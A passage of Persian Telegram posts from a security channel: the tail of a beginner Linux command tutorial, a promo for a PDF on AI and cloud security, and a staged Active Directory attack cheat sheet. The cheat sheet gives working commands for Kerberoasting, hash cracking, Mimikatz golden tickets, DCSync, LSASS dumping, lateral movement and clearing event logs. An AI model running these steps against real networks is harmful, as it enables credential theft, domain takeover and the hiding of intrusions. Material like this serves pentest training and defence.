* اگر دستور
cd
بدون آرگومان اجرا شود، به دایرکتوری خانگی (home) شما منتقل میشود.* استفاده از
cd ..
شما را به دایرکتوری بالاتر (والد) میبرد.5. pwd
شرح: دستور
pwd
(مخفف "print working directory") برای نمایش مسیر دایرکتوری فعلی که در آن قرار دارید، استفاده میشود. این دستور مسیر کامل دایرکتوری جاری را نمایش میدهد.استفاده:
pwd
این دستور مسیر دایرکتوری فعلی را نمایش میدهد، بهعنوان مثال:
/home/user/Documents
6. mkdir
دستور mkdir برای ایجاد دایرکتوریهای جدید در سیستم استفاده میشود.
mkdir <directory_name>
بهعنوان مثال:
mkdir new_folder
این دستور یک دایرکتوری به نام
new_folder
در دایرکتوری فعلی ایجاد میکند.آپشنها:
*
-p
: این آپشن به شما اجازه میدهد که چندین دایرکتوری را به صورت همزمان و به صورت سلسلهمراتبی بسازید. اگر دایرکتوری پدر وجود نداشته باشد، آنرا نیز ایجاد میکند.mkdir -p /home/user/new_folder/sub_folder
این دستور دایرکتوری
new_folder
و سپس sub_folder
را در داخل آن ایجاد میکند.جمعبندی:
این دستورات جزو دستورات پایهای و مهم در لینوکس هستند که برای مدیریت دایرکتوریها، فایلها، و جستجو در مستندات سیستم استفاده میشوند. برای کار با Kali Linux و انجام تستهای نفوذ، این دستورات بسیار مهم هستند و اغلب در فرآیندهای مختلف استفاده میشوند.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
⚡4👍3❤2
Active Directory attack Cheat sheet
(جمعآوری اطلاعات)
استفاده از ابزارهای:
BloodHound + SharpHound برای تحلیل گرافی
PowerView برای Enumeration:
Get-NetUser برای لیست کاربران
Get-NetGroup برای لیست گروهها
Get-NetComputer برای لیست کامپیوترها
AdFind.exe:
مثال: AdFind.exe -f "(objectcategory=person)"
ldapsearch روی لینوکس یا Kali
چک کردن Trust بین دامنهها (Get-NetDomainTrust)
🚪 مرحله ۲: Initial Access (دسترسی اولیه)
فیشینگ، فایل مخرب، دسترسی از طریق آسیبپذیریها
اکسپلویتهایی مثل:
Zerologon (CVE-2020-1472)
PetitPotam برای NTLM Relay
حمله به سرویسهای داخلی:
SMB Signing Disabled → Relay Attacks
NTLM Authentication Abuse
استفاده از Impacket برای اجرای ntlmrelayx.py
@TryHackBox | arian momeni
(جمعآوری اطلاعات)
استفاده از ابزارهای:
BloodHound + SharpHound برای تحلیل گرافی
PowerView برای Enumeration:
Get-NetUser برای لیست کاربران
Get-NetGroup برای لیست گروهها
Get-NetComputer برای لیست کامپیوترها
AdFind.exe:
مثال: AdFind.exe -f "(objectcategory=person)"
ldapsearch روی لینوکس یا Kali
چک کردن Trust بین دامنهها (Get-NetDomainTrust)
🚪 مرحله ۲: Initial Access (دسترسی اولیه)
فیشینگ، فایل مخرب، دسترسی از طریق آسیبپذیریها
اکسپلویتهایی مثل:
Zerologon (CVE-2020-1472)
PetitPotam برای NTLM Relay
حمله به سرویسهای داخلی:
SMB Signing Disabled → Relay Attacks
NTLM Authentication Abuse
استفاده از Impacket برای اجرای ntlmrelayx.py
@TryHackBox | arian momeni
👍6
How AI Impacts Cloud Security.pdf
7.6 MB
#AI #Cloud_Security
🔖 هوش مصنوعی و امنیت کلاد
⭕ رشد ناگهانی ابزارهای هوش مصنوعی پیشرفته (GenAI) در سال گذشته باعث شده هوش مصنوعی به مرکز توجه صنعت فناوری و افکار عمومی تبدیل شود. فناوری هوش مصنوعی نقشی مهم در بخش فناوری داشته، به ویژه در حوزه امنیت کلاد یا ابری. بازار امنیت کلاد به سرعت در حال رشد است و قابلیت های هوش مصنوعی حالا عامل تعیین کننده ای هنگام انتخاب راه حل امنیت کلاد توسط شرکت ها محسوب میشود.
@TryHackBox | Group | Github | YouTube
🔖 هوش مصنوعی و امنیت کلاد
⭕ رشد ناگهانی ابزارهای هوش مصنوعی پیشرفته (GenAI) در سال گذشته باعث شده هوش مصنوعی به مرکز توجه صنعت فناوری و افکار عمومی تبدیل شود. فناوری هوش مصنوعی نقشی مهم در بخش فناوری داشته، به ویژه در حوزه امنیت کلاد یا ابری. بازار امنیت کلاد به سرعت در حال رشد است و قابلیت های هوش مصنوعی حالا عامل تعیین کننده ای هنگام انتخاب راه حل امنیت کلاد توسط شرکت ها محسوب میشود.
@TryHackBox | Group | Github | YouTube
🔥5
Try Hack Box
Active Directory attack Cheat sheet (جمعآوری اطلاعات) استفاده از ابزارهای: BloodHound + SharpHound برای تحلیل گرافی PowerView برای Enumeration: Get-NetUser برای لیست کاربران Get-NetGroup برای لیست گروهها Get-NetComputer برای لیست کامپیوترها AdFind.exe:…
🧨 مرحله ۳: Privilege Escalation (ارتقاء دسترسی)
Kerberoasting:
گرفتن TGS Hash:
GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt
کرک با hashcat:
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting:
اگر کاربر نیاز به pre-auth نداشته باشه:
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
Unconstrained Delegation یا Privilege Misconfigurations
ACL Abuse با PowerView → پیدا کردن کاربرهایی که روی objectهای مهم کنترل دارند
@TryHackBox | arian momeni
Kerberoasting:
گرفتن TGS Hash:
GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt
کرک با hashcat:
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting:
اگر کاربر نیاز به pre-auth نداشته باشه:
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
Unconstrained Delegation یا Privilege Misconfigurations
ACL Abuse با PowerView → پیدا کردن کاربرهایی که روی objectهای مهم کنترل دارند
@TryHackBox | arian momeni
❤5⚡1
Try Hack Box
🧨 مرحله ۳: Privilege Escalation (ارتقاء دسترسی) Kerberoasting: گرفتن TGS Hash: GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt کرک با hashcat: hashcat -m 13100 hashes.txt rockyou.txt AS-REP Roasting: اگر کاربر نیاز به pre-auth نداشته باشه:…
🧬 مرحله ۴: Persistence (پایداری)
Golden Ticket:
ساختن با Mimikatz:
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-... /krbtgt:<hash>
Skeleton Key (موقعی که به DC دسترسی داریم)
SIDHistory Injection
Abuse کردن AdminSDHolder یا GPO برای حفظ دسترسی
🔁 مرحله ۵: Lateral Movement (حرکت جانبی)
تکنیکهای کلیدی:
Pass-the-Hash
Pass-the-Ticket
Overpass-the-Hash
استفاده از WMI / PsExec / WinRM برای اجرای ریموت
ابزارهای:
wmiexec.py
PsExec.exe
CrackMapExec (لینوکس)
SharpExec.exe یا PowerShell Remoting
🏰 مرحله ۶: Domain Controller Compromise
DCSync Attack با Mimikatz:
lsadump::dcsync /domain:domain.local /user:krbtgt
DCShadow Attack
Dump LSASS با Procdump:
procdump -ma lsass.exe lsass.dmp
و استخراج رمزها با Mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
🪖مرحله ۷: Exfiltration & Cleanup
Exfiltration با SMB، DNS Tunneling یا ابزارهایی مثل Rclone
حذف لاگ:
wevtutil cl Security
del *.evtx
پوشاندن ردپاها با ابزارهای پاکسازی (مثلاً Invoke-Phant0m.ps1)
نویسنده
@TryHackBox | arian momeni
Golden Ticket:
ساختن با Mimikatz:
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-... /krbtgt:<hash>
Skeleton Key (موقعی که به DC دسترسی داریم)
SIDHistory Injection
Abuse کردن AdminSDHolder یا GPO برای حفظ دسترسی
🔁 مرحله ۵: Lateral Movement (حرکت جانبی)
تکنیکهای کلیدی:
Pass-the-Hash
Pass-the-Ticket
Overpass-the-Hash
استفاده از WMI / PsExec / WinRM برای اجرای ریموت
ابزارهای:
wmiexec.py
PsExec.exe
CrackMapExec (لینوکس)
SharpExec.exe یا PowerShell Remoting
🏰 مرحله ۶: Domain Controller Compromise
DCSync Attack با Mimikatz:
lsadump::dcsync /domain:domain.local /user:krbtgt
DCShadow Attack
Dump LSASS با Procdump:
procdump -ma lsass.exe lsass.dmp
و استخراج رمزها با Mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
🪖مرحله ۷: Exfiltration & Cleanup
Exfiltration با SMB، DNS Tunneling یا ابزارهایی مثل Rclone
حذف لاگ:
wevtutil cl Security
del *.evtx
پوشاندن ردپاها با ابزارهای پاکسازی (مثلاً Invoke-Phant0m.ps1)
نویسنده
@TryHackBox | arian momeni
❤7